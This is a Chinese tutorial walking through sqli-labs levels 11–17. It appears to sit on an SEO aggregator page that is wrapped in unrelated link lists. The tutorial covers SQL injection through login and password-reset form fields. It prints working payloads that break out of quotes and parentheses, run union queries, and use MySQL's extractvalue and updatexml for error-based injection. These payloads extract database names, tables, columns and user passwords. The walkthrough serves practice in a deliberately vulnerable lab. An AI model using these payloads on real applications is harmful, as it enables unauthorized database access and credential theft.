当前位置: 首页 > news >正文

做网站 需要什么样的服务器网页版百度

做网站 需要什么样的服务器,网页版百度,国内crm系统哪家好,网站和网页的区别是什么SQL注入攻击是一种针对Web应用程序的安全漏洞,那么自然,SQL注入攻击也和前端页面息息相关,用户输入未被正确处理、动态查询的构建、前端JavaScript代码错误,等等我问题都可能造成安全威胁。 在上一节,我们了解了基础的…

        SQL注入攻击是一种针对Web应用程序的安全漏洞,那么自然,SQL注入攻击也和前端页面息息相关,用户输入未被正确处理、动态查询的构建、前端JavaScript代码错误,等等我问题都可能造成安全威胁。

在上一节,我们了解了基础的SQL注入模式,他们大多都从地址导航栏入手,直接向查询语句中注入攻击语句。本章我们来看和前端页面相关的一些SQL注入攻击。

1.Less-11
1.1 页面分析

来到第十一关,我们可以看到,这一关与前十关有很大区别,页面有了一个输入框,提示我们输入用户名和密码。

顺其自然我们想到,注入点就在输入框里。前十关用到的都是get请求,参数都体现在url上面,而这一关开始是post请求,参数在表单里面。我们可以直接在输入框里面进行注入。

1.2 尝试注入


我们尝试输入1,页面报错,再尝试输入1‘,页面显示报错原因

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' and password='' LIMIT 0,1' at line 1

这说明,我们如果想查询某个用户的信息,并且用户ID为1,就需要隔断后面的部分。

知道了SQL语句,我们就可以构造一个恒成立的SQL语句,看查询出的是什么。这里我们需要把--+换成#来进行注释,意思是一样的,后续就和之前一样了,使用联合注入获取数据库信息。


不同点主要在于:将注释符从 --+换成 #

2.Less-12

来到第十二关,我们输入1和1‘没有反应,当我们输入1"的时候出现报错信息,我们从报错信息知道SQL语句是双引号且有括号。

​​​​​​​

那么我们就可以构造相应的SQL注入语句了。

1") or 1=1 #
1") union select 1,2 #


3.Less-13、14、15、16

第十三关与第十二关类似,只需要将双引号换成单引号。

第十四关与第十一关类似,只需要将单引号换成双引号。

第十五关和第十一关一样,只是不产生报错信息,对此我们可以使用布尔盲注。

第十六关和第十二关一样,需要使用布尔盲注。

4.Less-17(报错注入)

现在我们来到第十七关,根据页面来看,这是一个密码重置页面,也就是说我们已经登入系统了,可以执行修改操作。


根据源代码,SQL语句会对输入的账户名进行检测,对输入的特殊字符进行转义,我们能利用的只有更新密码的SQL语句。

4.1 extractvalue报错注入

这里我们需要用到extractvalue报错注入,extractvalue 是一个XQuery函数,用于从XML文档中提取特定值。格式为extractvalue(XML_document,XPath_string)。

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) 作用:从XML_document中提取符合XPATH_string的值,当我们XPath_string语法报错时候就会报错

了解了extractvalue的原理后,我们就可以开始注入了。和前面类似,首先我们来进行数据库版本爆破

1' and (extractvalue(1,concat(0x5c,version(),0x5c)))#

成功得到了数据库版本为5.7.26,接下来我们再来爆数据库。

1' and (extractvalue(1,concat(0x5c,database(),0x5c)))# 

又成功得到了数据库名,接下来,爆表名

1' and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))#

爆字段名。

1' and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x5c)))#

爆字段内容

1' and (extractvalue(1,concat(0x5c,(select group_concat(username,password) from users),0x5c)))# 

​​​​​​​当我们提交时,发现页面报错,报错显示我们不能查询和更新同一张表。

针对此问题,我们需要加一个中间表。本关只需要我们输入正确账号,所以爆出的是该账户的原始密码。只要查询时不是users表就不会报错。

1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin1') b) ,0x5c)))# 

 

成功得到密码,爆破成功。

对于这两条语句:

  • 目标用户:第一个示例尝试获取users表中所有用户的用户名和密码,而第二个示例只针对特定用户admin1
  • 查询结构:第一个示例使用group_concat来合并所有用户的用户名和密码,第二个示例使用子查询来获取特定用户的密码。
4.2 updatexml报错注入

对于本关,我们还可以采用updatexml报错注入,updatexml 是MySQL数据库中的一个函数,它允许你使用XPath表达式和XML数据进行交互。然而,如果不正确使用,updatexml 也可能成为SQL注入攻击的漏洞。SQL注入攻击者可能会利用这个函数来尝试访问或修改数据库中的XML数据。

格式为UPDATEXML (XML_document, XPath_string, new_value)。第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc;第二个参数:XPath_string (Xpath格式的字符串) ;第三个参数:new_value,String格式,替换查找到的符合条件的数据

作用:改变文档中符合条件的节点的值,改变XML_document中符合XPATH_string的值。当我们XPath_string语法报错时候就会报错,updatexml()报错注入和extractvalue()报错注入基本差不多

123' and (updatexml(1,concat(0x5c,version(),0x5c),1))#     爆版本
123' and (updatexml(1,concat(0x5c,database(),0x5c),1))#    爆数据库123' and (updatexml(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c),1))#      爆表名
123' and (updatexml(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name ='users'),0x5c),1))#爆字段名123' and (updatexml(1,concat(0x5c,(select password from (select password from users where username='admin1') b),0x5c),1))#
爆密码该格式针对mysql数据库。
爆其他表就可以,下面是爆emails表
123' and (updatexml(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name ='emails'),0x5c),1))#1' and (updatexml (1,concat(0x5c,(select group_concat(id,email_id) from emails),0x5c),1))#   爆字段内容。

剩下的与extractvalue类似,也是要注意查询和修改不能为同一表的问题,但是可以爆破其他表

http://www.tj-hxxt.cn/news/10904.html

相关文章:

  • ip查询地址精准地图上海网站seo外包
  • 给网站做路由谷歌seo代运营
  • 外贸网站制作价格表seo类目链接优化
  • 北京靠谱的网站公司深圳网站建设优化
  • 建一个网站需要什么手续世界最新新闻
  • 做网站大概要网站推广优化怎样
  • 做电脑回收什么网站好直接下载app
  • 企业网站开发论文总结想建立自己的网站
  • 电脑网站上的电影怎么下载搜狗广告联盟
  • 企业网站建设上机考试对seo的理解
  • wordpress ss管理seo网站优化怎么做
  • 台州免费建站竞价推广和信息流推广
  • bootstrap网页模板下载徐州seo招聘
  • 公司要网站建设提高工作效率总结心得
  • 做的图怎么上传到网站网络优化是做什么的
  • 用什么做网站手机网站制作软件
  • 需要做网站的企业资源乐陵seo外包公司
  • b2b电子商务的模式有哪些seo关键词排名教程
  • 哪个网站可以找人做清洁合肥seo网站建设
  • 软件公司都是帮别人做网站么泉州全网营销
  • 做招商加盟的网站厦门seo推广公司
  • 网站建设技术的发展创建自己的网站
  • 电子商务网站建设选择seo排名推广工具
  • 竞价网站做推广太原网站排名推广
  • 网站建设的公司怎么做广告公司经营范围
  • 简洁的网站地图模板免费网站分析seo报告是坑吗
  • 淘宝不能发布网站源码做商品网络营销的优缺点
  • 微网站建设代理商免费站推广网站在线
  • 政府网站的建设目标鞍山seo优化
  • 上海市奉贤区建设局网站交换链接营销成功案例